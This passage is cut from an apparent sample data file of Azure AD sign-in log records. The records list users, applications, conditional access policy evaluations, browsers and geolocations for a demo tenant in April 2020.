'73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",875c831a-2c9c-4e0a-b7c7-b83012f80c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,875c831a-2c9c-4e0a-b7c7-b83012f80c00,SigninLogs,Sucess,41.90428925,-85.99833679
+256,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:39.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2f497c11-ffb2-4e73-b51d-4173f46a4e27,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,ACOM Azure Website,23523755-3a2b-41ca-9315-f81f3f566a95,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",22fd8c7c-75eb-4549-80fa-1727f78d0d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,22fd8c7c-75eb-4549-80fa-1727f78d0d00,SigninLogs,Sucess,50.6406517,5.572050095
+257,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,47:45.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0afac25f-44ce-44fd-b06d-3f13333126be,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:47,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",c0245186-29e3-436a-add4-db49b8f60f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c0245186-29e3-436a-add4-db49b8f60f00,SigninLogs,Sucess,38.73078156,-78.17196655
+258,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:40.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e9b90d2a-5862-48c6-8147-c83d5c426c23,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",fd7a6355-56f5-4bc2-9ad4-c2594b740f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,fd7a6355-56f5-4bc2-9ad4-c2594b740f00,SigninLogs,Sucess,33.7984581,-84.38828278
+259,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:24.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,462b0178-9ac6-4446-839a-1a09a98709f1,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 15:04,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",e555e9d8-8e19-4918-91cf-fdbc2ade1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e555e9d8-8e19-4918-91cf-fdbc2ade1100,SigninLogs,Sucess,33.7984581,-84.38828278
+260,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:01.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b6c8469f-b0f2-0000-54f3-739d2a051555,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:18,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",687149c8-f736-4452-b785-99f3852a1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,687149c8-f736-4452-b785-99f3852a1200,SigninLogs,Sucess,33.7984581,-84.38828278
+261,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:38.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9aa23ece-4e3a-4210-9a43-1483bc8302a4,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,US,Visual Studio Code,aebc6443-996d-45c2-90f0-388ff96faa56,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 81.0.416'}",16ff4ef1-f75c-48d7-9f30-d06d746c2000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,16ff4ef1-f75c-48d7-9f30-d06d746c2000,SigninLogs,Sucess,38.47222137,-77.41989899
+262,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:30.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e1af5996-d9bf-40cb-9943-e470151c5e20,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 19:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e446f264-3933-463f-bc0b-d42246932200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e446f264-3933-463f-bc0b-d42246932200,SigninLogs,Sucess,36.6404686,-78.26995087
+263,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:42.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,48d247a7-8721-47eb-9c46-ed06ccf722be,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 